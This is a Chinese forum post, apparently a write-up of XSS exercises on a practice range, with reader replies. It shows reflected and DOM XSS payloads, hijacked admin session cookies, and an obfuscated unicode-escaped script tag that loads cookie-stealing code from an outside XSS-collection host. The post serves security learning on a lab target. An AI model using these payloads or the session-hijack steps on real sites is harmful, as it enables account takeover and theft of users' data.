首页
社区
课程
招聘
【封神台】前端渗透 XSS wp
发表于: 2021-8-5 13:46 2849

【封神台】前端渗透 XSS wp

2021-8-5 13:46
2849

image-20210805092731188

image-20210805092837982

image-20210805093254599

image-20210805093354847

image-20210805093436060

环境:http://59.63.200.79:8082/

image-20210805093636171

payload

image-20210805094003613

先找一个xss平台导航

image-20210805100643223

image-20210805100727610

image-20210805100830687

image-20210805100905290

payload

image-20210805100954668

image-20210805101110064

将这个两个cookie值加入

image-20210805102514228

image-20210805102545578

image-20210805102705599

了解一些基础知识

DOM XSS注入核心代码document,程序和脚本可以通过dom接口来修改前端网页

image-20210805103724506

image-20210805103901000

image-20210805103936688

image-20210805104907949

直接去导航站长工具

image-20210805105557481

image-20210805105624726

image-20210805105655587

image-20210805110006489

image-20210805110120932

image-20210805110334088

image-20210805110425417

' oninput=alert(/xss/)
' oninput=alert(/xss/)
' oninput=alert(/xss/) \
' oninput=alert(/xss/) \
http://59.63.200.79:8082/index.php?c=mail&m=<script>alert(/xss/)</script>
http://59.63.200.79:8082/index.php?c=mail&m=<script>alert(/xss/)</script>
 
http://59.63.200.79:8082/index.php?c=mail&m=极限最短代码
http://59.63.200.79:8082/index.php?c=mail&m=极限最短代码
member_cookie=d256812b83f3751716e6
member_uid=1
member_cookie=d256812b83f3751716e6
member_uid=1
http://59.63.200.79:8082/admin.php
http://59.63.200.79:8082/admin.php
 
 
http://59.63.200.79:8014/dom_xss/index.php/.txt?id=<img src=x onerror=alert(/dom-xss/)
http://59.63.200.79:8014/dom_xss/index.php/.txt?id=<img src=x onerror=alert(/dom-xss/)
http://59.63.200.79:8014/dom_xss/?id=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e
http://59.63.200.79:8014/dom_xss/?id=\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e
  • 掌控安全里面的靶场前端渗透/XSS,学习一下!
  • 环境:http://b-ref-xss-1s.lab.aqlab.cn/
  • 了解一下
  • 一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了
    XSS一般在什么业务场景容易遇见?
    重灾区:评论区、留言区、个人信息、订单信息等。
    针对型:站内信、网页即时通讯、私信、意见反馈。
    存在风险:搜索框、当前目录、图片属性等。

image-20210805092731188

image-20210805092837982

image-20210805093254599

image-20210805093354847

image-20210805093436060

环境:http://59.63.200.79:8082/

image-20210805093636171

image-20210805094003613

image-20210805100643223

image-20210805100727610

image-20210805100830687

image-20210805100905290

image-20210805100954668

image-20210805101110064

image-20210805102514228

image-20210805102545578

image-20210805102705599

  • 环境:http://59.63.200.79:8014/dom_xss/
  • 注意:被waf拦截就将cookie清空

image-20210805103724506

image-20210805103901000

image-20210805103936688

image-20210805104907949


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 3
支持
分享
最新回复 (6)
雪    币: 483
活跃值: (682)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
膜拜,佩服大佬
2021-8-5 19:23
0
雪    币: 638
活跃值: (1772)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
3

第一个xss 直接执行网页里的js 不就有了?

2021-8-6 17:49
0
雪    币: 1109
活跃值: (704)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
4
师傅、这只是靶场,别较真啊
2021-8-6 18:40
0
雪    币: 6
活跃值: (1151)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
真实环境往往没那么简单
2021-8-9 08:38
0
雪    币: 9
活跃值: (287)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
膜拜,佩服大佬
2022-9-10 10:46
0
游客
登录 | 注册 方可回帖
返回
//